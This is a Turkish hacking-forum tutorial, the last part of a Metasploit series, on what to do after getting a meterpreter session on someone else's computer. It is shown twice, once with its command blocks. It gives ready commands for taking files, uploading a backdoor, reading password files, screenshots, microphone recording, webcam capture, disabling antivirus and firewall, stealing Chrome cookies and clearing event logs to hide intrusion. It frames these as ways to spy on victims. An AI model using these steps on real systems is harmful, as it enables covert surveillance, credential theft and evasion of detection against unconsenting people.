-
JFoundlow
</ÖLÜ>
Sa SHT Ailesi Bgün Metasploit serimizin son Konusundayım aslında anlatılacak çok şey var daha ama o konuları seri içine almadım
Ben Bu seride genel olarak metasploiti en iyi nasıl kullanırsınız onu anlatmak istedim o konular kullanımın dışında ek bilgiler ben kullanımı detaylı bi şekilde anlattığım düşündüm
bu seri türkiyenin hiç bir forumnda yoktur Yarrağam Sen Nerden biliyon derseniz ben metasploit hakkında 3-4 Kitap okudum bu anlattıklarım aklımda kalanlar bazı yerleride unutmuşum kitabı açıp bakdım benim içinde iyi oldu bugun İLERİ SEVİYE PAYLOAD CLIENT SIDE EXPLOİT konusa göz gezdiricez hemen konuya geçelim
Evet Arakdaşlar Metasploit üzerinde normal payloadlar bide ileri seviye payloadlar vardır bu payloadların en bilindik olanı meterpreter payloadlarıdır neden buna ileri seviye payload diyorlar derseniz
bu payload başarılı olmama ihtimali az o yüzden ileri seviye payload diyolar bu benim fikirim
meterpreter nedir derseniz Hedef Sistemin commands(Her Halde Böyle Yazılıyo ) oturuma geçmek için kullanılan bir payload türüdür
en sevdiğim yönü size hedef sistemin win yada linux olamsı önemli değil linux komutları çalışıyo yani
meterpreter payload ile hedef sisteme girince klosörleri listelemk isitiyince "DIR" yerine "ls" Komutu kullanıyoz
Şimdik Payloadlarımzı Oluşturduk Karşı Sistemin meterpreter oturumuna girdik ne yapıcaz amk diyorsunuz demi
meterpreter otuma girince
komutu ile sistem üzerinde kullanılacak komutları görebilirsiniz
Yarram biz windows komutları kullanmak istiyorum dersseniz
meterpreter oturmdayken shell komutu girmeniz gerek
Meterpreterin içinde çok seksi scriptlerim vardrı bu scriptler işimizi kolaylaştırmak için yazılmış scriptlerdir Bu scriptler Sistem Hakında bilgi almak için bilgi toplamak için kullanılan scriptlerdir
Manuel yapıcağınız şeyleri scriptlerle birleştirmiş adamlar Bu scriptleri nasıl görücez
meterpreter oturumdatken run komutunu girince
önünüze söyle bir yazı çıkacak Display all 229 possibilities (y or n)
siz " y " bastığınız zaman scriptleri listeler lakin hepsini değil aşşağıda" More " yazar onun üzerine basınca listelemeye devam eder
Şimdik En Can alıcı yere geldik meterpreter oturma girince karşı tarafdan dosya çekme karşı tarafa dosya yükleme webcam alma gibi işlermler nasıl yapılır onları göstericem
DOSYA İNDİRME
İndirmek istediğiniz dosyanın dizininde olmanız gerekiyo yani
C:Users/JF/Desktop/Videolar/porno.mp4 siz bu resimi indirmek istiyosunuz
ama
C:Users/JF/Desktop/resimler bu dizindesiniz gidip o resimi indiremezsiniz
DOSYA UPLOAD
Sisteme girdik belki bi sıkıntı çıktı backdoow yerleştirmeniz gerek o zamn dosya upload etmeniz gerekiyo
DOSYA İÇERİĞİ OKUMA
Herhangi bir içeriği okunabilri bi dosyayı indirmeden okumak isityorsunuz örnek gmailşifre.txt dosyasını okumak istiyosunuz "cat" komutu devreye giriyo
DOSYA SİLME
Oropu çocuğunun teki sizin bilgilerinizi çaldı siz bunu silmek istiyorsunuz pc ye sızdınız dosyayı buldunuz ve silmek istiyosunuz "rm" komutu devreye giriyo
NOT: Sildiğiniz Dosya Geri Dönüşüm Kutusana Gitmez
EKRAN GÖRÜNTÜSÜ ALMA
Ekran Görüntüsü almak için "screenshot" komutunu kullanmanız gerek
-p : çekdiğiniz ekran görüntüsü hangi dizine kaydetmek istediğinizi girmeniz gereken parametre
-q:Çektiğiniz ekran görüntüsnü çözünürlüğü bu defult ayar 50 dir bunu yükseltebilirsiniz
SES KAYDI ALMA
Ses Kaydı Almak İçin "record_mic" komutu kullanırsınız
-d
arametresi kaç saniye kayıt alacağını belirtmek için kullanırsınız
-farametresi Ses Kayıdını Kaydetmek istediğiniz dizini belirtsiniz
WEBCAM GİRME
Web Cam anlık webcam alabilirsiniz yada açıp izliyebilrsiniz beraber web cam sohbeti yapabilirsiniz sizin fantezinize bağlı
Ben Anlık Almayı göstericem
ANTİ VİRÜS FİREWALL KAPATMA
Genellikle Açık Olur Kapatmanızı Şiddetle Tavsiye Ederim
Bu iş İçin Scriptler Vardır Bazen Bu scriptler İşe yaramaz hatta verdiğim komut bile işe yaramaz onun İçin bazı yöntemler var onuda siz bulun amk
BROWSERDAN BİLGİ ÇEKME
Genellikle İlk Yaptığım Komutlardan biri Cooikleri çekmek olur
görüldüğü gibi gather modülü kullandık burda chrome yerinw başka browserlarde yazılabilir
İZLERİ TEMZİLME(LOGLARI SİLME)
Her PC log tutmaz eğer ayarlardan ayarladıysa log tutuyordur ama sistemden çıkarken bu komutları girmeniiz tavsiye ederim
2 Komut Vardır
Evet Arkadşalr Meterpreter oturmundada en Kullanışlı Komutları Göstedim Metasploit Serimiz An İtibariyle Bitmiş Bulunmaktadır Şağlıcakla Kalın
Ben Bu seride genel olarak metasploiti en iyi nasıl kullanırsınız onu anlatmak istedim o konular kullanımın dışında ek bilgiler ben kullanımı detaylı bi şekilde anlattığım düşündüm
bu seri türkiyenin hiç bir forumnda yoktur Yarrağam Sen Nerden biliyon derseniz ben metasploit hakkında 3-4 Kitap okudum bu anlattıklarım aklımda kalanlar bazı yerleride unutmuşum kitabı açıp bakdım benim içinde iyi oldu bugun İLERİ SEVİYE PAYLOAD CLIENT SIDE EXPLOİT konusa göz gezdiricez hemen konuya geçelim
View hidden content is available for registered users!
Evet Arakdaşlar Metasploit üzerinde normal payloadlar bide ileri seviye payloadlar vardır bu payloadların en bilindik olanı meterpreter payloadlarıdır neden buna ileri seviye payload diyorlar derseniz
bu payload başarılı olmama ihtimali az o yüzden ileri seviye payload diyolar bu benim fikirim
meterpreter nedir derseniz Hedef Sistemin commands(Her Halde Böyle Yazılıyo ) oturuma geçmek için kullanılan bir payload türüdür
en sevdiğim yönü size hedef sistemin win yada linux olamsı önemli değil linux komutları çalışıyo yani
meterpreter payload ile hedef sisteme girince klosörleri listelemk isitiyince "DIR" yerine "ls" Komutu kullanıyoz
Şimdik Payloadlarımzı Oluşturduk Karşı Sistemin meterpreter oturumuna girdik ne yapıcaz amk diyorsunuz demi
meterpreter otuma girince
Kod:
helpYarram biz windows komutları kullanmak istiyorum dersseniz
Kod:
shellMeterpreterin içinde çok seksi scriptlerim vardrı bu scriptler işimizi kolaylaştırmak için yazılmış scriptlerdir Bu scriptler Sistem Hakında bilgi almak için bilgi toplamak için kullanılan scriptlerdir
Manuel yapıcağınız şeyleri scriptlerle birleştirmiş adamlar Bu scriptleri nasıl görücez
Kod:
runönünüze söyle bir yazı çıkacak Display all 229 possibilities (y or n)
siz " y " bastığınız zaman scriptleri listeler lakin hepsini değil aşşağıda" More " yazar onun üzerine basınca listelemeye devam eder
Şimdik En Can alıcı yere geldik meterpreter oturma girince karşı tarafdan dosya çekme karşı tarafa dosya yükleme webcam alma gibi işlermler nasıl yapılır onları göstericem
DOSYA İNDİRME
İndirmek istediğiniz dosyanın dizininde olmanız gerekiyo yani
C:Users/JF/Desktop/Videolar/porno.mp4 siz bu resimi indirmek istiyosunuz
ama
C:Users/JF/Desktop/resimler bu dizindesiniz gidip o resimi indiremezsiniz
Kod:
download -r dosyaismi/dizin
örenk
download -r resimler /root/DeskotopDOSYA UPLOAD
Sisteme girdik belki bi sıkıntı çıktı backdoow yerleştirmeniz gerek o zamn dosya upload etmeniz gerekiyo
Kod:
upload dizin/dosya
örnek
upload c:/users/JF/Documents/backdoor.exeDOSYA İÇERİĞİ OKUMA
Herhangi bir içeriği okunabilri bi dosyayı indirmeden okumak isityorsunuz örnek gmailşifre.txt dosyasını okumak istiyosunuz "cat" komutu devreye giriyo
Kod:
cat dosya
örnek
cat gmailşifre.txtDOSYA SİLME
Oropu çocuğunun teki sizin bilgilerinizi çaldı siz bunu silmek istiyorsunuz pc ye sızdınız dosyayı buldunuz ve silmek istiyosunuz "rm" komutu devreye giriyo
Kod:
rm dosyaismi
örnek
rm ifşaNOT: Sildiğiniz Dosya Geri Dönüşüm Kutusana Gitmez
EKRAN GÖRÜNTÜSÜ ALMA
Ekran Görüntüsü almak için "screenshot" komutunu kullanmanız gerek
Kod:
screenshot -p kaydetmekistediğinz dizin -q 100
örnek
screenshot -p root/Desktop/ekrangörüntüsü.jpeg -q 100-p : çekdiğiniz ekran görüntüsü hangi dizine kaydetmek istediğinizi girmeniz gereken parametre
-q:Çektiğiniz ekran görüntüsnü çözünürlüğü bu defult ayar 50 dir bunu yükseltebilirsiniz
SES KAYDI ALMA
Ses Kaydı Almak İçin "record_mic" komutu kullanırsınız
Kod:
record_mic -d 5 -f /root/Desktop/seskayıdı.mp3-d
arametresi kaç saniye kayıt alacağını belirtmek için kullanırsınız-f
arametresi Ses Kayıdını Kaydetmek istediğiniz dizini belirtsinizWEBCAM GİRME
Web Cam anlık webcam alabilirsiniz yada açıp izliyebilrsiniz beraber web cam sohbeti yapabilirsiniz sizin fantezinize bağlı
Ben Anlık Almayı göstericem
Kod:
webcam -h yaparak parametreleri görüp istediğiniz yapabilirsiniz
webcam_list
wbcam listeldeikden sonra orda önünüze sayı şeklinde verir
webcam_snap numara
yani söyle verir
1:Back Camera
2:Front Camera
biz Back Şeçeriz Genellikle
webcam_snap 1ANTİ VİRÜS FİREWALL KAPATMA
Genellikle Açık Olur Kapatmanızı Şiddetle Tavsiye Ederim
Bu iş İçin Scriptler Vardır Bazen Bu scriptler İşe yaramaz hatta verdiğim komut bile işe yaramaz onun İçin bazı yöntemler var onuda siz bulun amk
Kod:
run getcountermeausures -d -kBROWSERDAN BİLGİ ÇEKME
Genellikle İlk Yaptığım Komutlardan biri Cooikleri çekmek olur
Kod:
run post/windows/gather/enum_chromegörüldüğü gibi gather modülü kullandık burda chrome yerinw başka browserlarde yazılabilir
İZLERİ TEMZİLME(LOGLARI SİLME)
Her PC log tutmaz eğer ayarlardan ayarladıysa log tutuyordur ama sistemden çıkarken bu komutları girmeniiz tavsiye ederim
2 Komut Vardır
Kod:
1. Komut: clearev
2.Komut:run event_manger -cEvet Arkadşalr Meterpreter oturmundada en Kullanışlı Komutları Göstedim Metasploit Serimiz An İtibariyle Bitmiş Bulunmaktadır Şağlıcakla Kalın
Döküman - Kali Linux Metasploit #1
Sa SHT ailesi bugün sizlerle metasploit anlatmaya başlıyacam metasploit diğer kali linux toolslarına nazaran çokdaha geniş o yüzden 5 6 tane metasploit konuyu garanti gelicek Bu Konumda Metasploit ilgili bilgi vericem hemen konuya geçelim Gizli içerik Yıllar Sonra Konu Açmaya dewamke İlk...
spyhackerz.org
Döküman - Kali Linux Metasploit #2
Sa SHT ailesi bugün metasploit 2.bölümndeyiz bu konuda genel komutları görücez işte payload seçme exploit seçme exploite uygun payloadları bula vb. konuya geçelim Gizli içerik
spyhackerz.org
Döküman - Kali Linux Metasploit #3
Sa SHT ailesi Bugün Metasploit Serimiz Devam Ediyoruz Bugün Bahsediceğim Şey auxiliary Konuya Hemen Geçelim Gizli içerik Evet Arkadaşlar Konumuzun Sonuna Geldik TR de kimse auxiliary bu kadar anlatan yok ilk bu forumda ben anlattım isterseniz bakabilirsiniz internete 1. ve 2. Konularıma Baka...
spyhackerz.org
Döküman - Kali Linux Metasploit #4
Sa SHT ailesi bugün metaploit serimizin 4 bölümündeyiz bu bölümde msfpayload,msfencode,msfvenom,msfcli bahsedicem biraz karışık konular bunlar ama metasploitin olmassa olmazları diyebilirz hemen Konuya geçelim Gizli içerik Not:Hiç Alıntı Yoktur Ve TR de Çok Az Hatta Nerdeyse Yok
spyhackerz.org
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
